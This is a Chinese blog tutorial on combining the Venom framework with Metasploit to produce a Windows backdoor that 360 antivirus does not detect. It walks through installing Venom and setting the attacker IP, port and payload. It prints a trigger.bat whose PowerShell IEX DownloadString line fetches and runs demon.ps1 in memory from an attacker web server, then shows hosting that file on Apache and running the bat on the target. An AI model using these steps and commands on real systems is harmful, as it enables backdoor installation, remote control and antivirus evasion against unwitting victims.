美文网首页
Venom 结合 Metasploit绕过360

Venom 结合 Metasploit绕过360

作者: Jackey_song | 来源:发表于2020-03-23 22:03 被阅读0次

下载安装

下载地址:https://github.com/r00t-3xp10it/venom

1.从Github上下载框架,你可以下载到以下格式:

tar.gz OR zip OR git clone

2.赋予文件可执行权限:

cd venom-main

sudo chmod -R +x *.sh

sudo chmod -R +x *.py

3.安装依赖关系包:

cd aux

sudo ./setup.sh

4.运行

sudo ./venom.sh

使用步骤:

1.上图这里的模块比较多有 apk(安卓)/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:

2. 填写攻击者的 IP 以及 端口

3.填写 后门名称

4. 填写后门 监听模块类型

4. 查看 outoput 输出文件。

5.这里选择 msf 的后门模块,选择完后会自动帮你设置相关参数,—-更加自动化懒人化

6.我们这里只需要 trigger.bat 文件,到目标系统运行一次即可!

在此之前,我们简单查看下 bat 文件的内容。这里需要我们把 xxxx.ps1 文件,放到 web 服务器上。 让 powershell 去远程下载木马文件。

:: powershell template | Author: r00t-3xp10it

:: Matthew Graeber - DownloadString

:: Download/execute payload in RAM

:: ---

@echo off

echo [*] Please wait, preparing software ...

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.149/demon.ps1')

7.开启 kali 下的 apache 服务,将 xxxx.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址。

service apache2 start

8.准备工作完成,将 trigger.bat 文件丢到目标系统,可以尝试使用 360 扫描检查。可以看到,360 并未做任何拦截及报毒

相关文章

  • Venom 结合 Metasploit绕过360

    下载安装 下载地址:https://github.com/r00t-3xp10it/venom 1.从Github...

  • 网络安全-Day40-Cobalt Strike使用(二)

    结合metasploit,反弹shell 1、启动CS服务端(./teamserver 192.168.31.23...

  • 内网代理神器Venom及三层代理演示

    Venom的简单使用介绍 Venom项目地址:https://github.com/Dliv3/Venom/rel...

  • Metasploit Unleashed

    Metasploit Unleashed–免费的metasploit教程 What is Metasploit? ...

  • 0基础入门网安,应该做哪些准备?

    在网安的学习中,几乎没有人能绕过Metasploit工具的使用, 比如:安全漏洞检测、攻击漏洞、自己编写漏洞等 然...

  • 优秀的网安人才必备的工具及使用方法

    Metasploit安全工具的使用,已经成为每个优秀网安人才的底层能力 在网安的学习中,几乎没有人能绕过Metas...

  • APT实例

    结合metasploit,反弹shell 1、 启动服务端:(test 为待会靶机连接服务器的密码) (./te...

  • venom

    放了一个多月的电影票,今天晚上终于找时间去看了,漫威的毒《毒液》,除了剧中主人公venom给人点惊喜外,似乎看不到...

  • Venom

    看完影片之后,脑子里还比较清晰的印象就是: • 毒液被追杀的那一段很燃。无人机的破坏力太大,埃迪骑摩托车的技术很...

  • MSF升级及常用命令

    一、什么是metasploit Metasploit就是一个漏洞框架。它的全称叫做The Metasploit F...

网友评论

      本文标题:Venom 结合 Metasploit绕过360

      本文链接:https://www.haomeiwen.com/subject/qjigyhtx.html